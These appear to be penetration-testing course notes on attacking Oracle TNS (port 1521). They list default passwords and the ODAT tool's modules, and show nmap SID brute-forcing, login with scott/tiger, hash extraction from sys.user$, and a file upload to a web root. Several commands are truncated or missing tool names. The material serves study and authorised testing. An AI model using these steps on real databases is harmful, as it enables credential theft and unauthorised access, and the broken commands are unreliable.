Oracle TNS TCP/1521

The configuration files for Oracle TNS are called tnsnames.ora and listener.ora


Oracle TNS is often used with other Oracle services like Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, web servers, and many more. There have been made many changes for the default installation of Oracle services. For example, Oracle 9 has a default password, CHANGE_ON_INSTALL, whereas Oracle 10 has no default password set. The Oracle DBSNMP service also uses a default password, dbsnmp that we should remember when we come across this one. Another example would be that many organizations still use the finger service together with Oracle, which can put Oracle’s service at risk and make it vulnerable when we have the required knowledge of a home directory.

Oracle databases can be protected by using so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution.

Setting Description
DESCRIPTION A descriptor that provides a name for the database and its connection type.
ADDRESS The network address of the database, which includes the hostname and port number.
PROTOCOL The network protocol used for communication with the server
PORT The port number used for communication with the server
CONNECT_DATA Specifies the attributes of the connection, such as the service name or SID, protocol, and database instance identifier.
INSTANCE_NAME The name of the database instance the client wants to connect.
SERVICE_NAME The name of the service that the client wants to connect to.
SERVER The type of server used for the database connection, such as dedicated or shared.
USER The username used to authenticate with the database server.
PASSWORD The password used to authenticate with the database server.
SECURITY The type of security for the connection.
VALIDATE_CERT Whether to validate the certificate using SSL/TLS.
SSL_VERSION The version of SSL/TLS to use for the connection.
CONNECT_TIMEOUT The time limit in seconds for the client to establish a connection to the database.
RECEIVE_TIMEOUT The time limit in seconds for the client to receive a response from the database.
SEND_TIMEOUT The time limit in seconds for the client to send a request to the database.
SQLNET.EXPIRE_TIME The time limit in seconds for the client to detect a connection has failed.
TRACE_LEVEL The level of tracing for the database connection.
TRACE_DIRECTORY The directory where the trace files are stored.
TRACE_FILE_NAME The name of the trace file.
LOG_FILE The file where the log information is stored.


sudo apt-get install libaio1 python3-dev alien -y
git clone
cd odat/
git submodule init
git submodule update
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

Testing ODAT

./ -s x.x.x.x 

 Choose a main command
all to run all modules in order to know what it is possible to do
tnscmd to communicate with the TNS listener
tnspoison to exploit TNS poisoning attack (SID required)
sidguesser to know valid SIDs
snguesser to know valid Service Name(s)
passwordguesser to know valid credentials
utlhttp to send HTTP requests or to scan ports
httpuritype to send HTTP requests or to scan ports
utltcp to scan ports
ctxsys to read files
externaltable to read files or to execute system commands/scripts
dbmsxslprocessor to upload files
dbmsadvisor to upload files
utlfile to download/upload/delete files
dbmsscheduler to execute system commands without a standard output
java to execute system commands
passwordstealer to get hashed Oracle passwords
oradbg to execute a bin or script
dbmslob to download files
stealremotepwds to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
userlikepwd to try each Oracle username stored in the DB like the corresponding pwd
smb to capture the SMB authentication
privesc to gain elevated access
cve to exploit a CVE
search to search in databases, tables and columns
unwrapper to unwrap PL/SQL source code (no for 9i version)
clean clean traces and logs


  Oracle TNS
sudo nmap -p1521 -sV --open

Nmap – SID Bruteforcing

sudo nmap -p1521 -sV --open --script oracle-sid-brute


./ all -s

SQLplus – Log In

sqlplus scott/[email protected]/XE

If you come across the following error sqlplus: error while loading shared libraries: cannot open shared object file: No such file or directory, please execute the below, taken from here.

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/";sudo ldconfig

SQLPlus Commands

Oracle RDBMS – Interaction

SQL> select table_name from all_tables;

Oracle RDBMS – Database Enumeration

mstrkoffee@htb[/htb]$ sqlplus scott/[email protected]/XE as sysdba

Oracle RDBMS – Extract Password Hashes

SQL> select name, password from sys.user$;

Oracle RDBMS – File Upload

echo “Oracle File Upload Test” > testing.txt
./ utlfile -s -d XE -U scott -P tiger –sysdba –putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

Command Description
./ all -s <FQDN/IP> Perform a variety of scans to gather information about the Oracle database services and its components.
sqlplus <user>/<pass>@<FQDN/IP>/<db> Log in to the Oracle database.
./ utlfile -s <FQDN/IP> -d <db> -U <user> -P <pass> --sysdba --putFile C:\\insert\\path file.txt ./file.txt Upload a file with Oracle RDBMS.